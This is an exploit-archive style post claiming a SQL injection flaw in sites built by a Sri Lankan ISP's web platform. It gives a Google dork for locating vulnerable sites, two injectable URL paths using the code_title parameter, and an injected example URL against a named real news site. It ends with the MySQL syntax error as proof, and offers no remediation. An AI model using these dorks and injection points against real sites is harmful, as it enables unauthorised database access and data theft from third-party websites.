#################################################################################################
# Exploit Title : Solution by Lankacom Internet Service Provider in Sri Lanka SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 25/06/2018
# Vendor Homepage : lankacom.net
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
#################################################################################################
# Google Dork : intext:''Solution by Lankacom.''
# Exploits :
/index.php?page_cat=article-details&page=article-details&code_title=[SQL Inj]
/index.php?page_cat=news-section&page=news-section&code_title=[SQL Inj]
#################################################################################################
# Example Site : island.lk/index.php?page_cat=article-details&page=article-details&code_title=186887%27
# Proof of Concept for SQL Inj => archive.is/Lut7y
# SQL Database Error :
SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax;
check the manual that corresponds to your MySQL server version for the right syntax to use near ''186887''' at line 1
################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################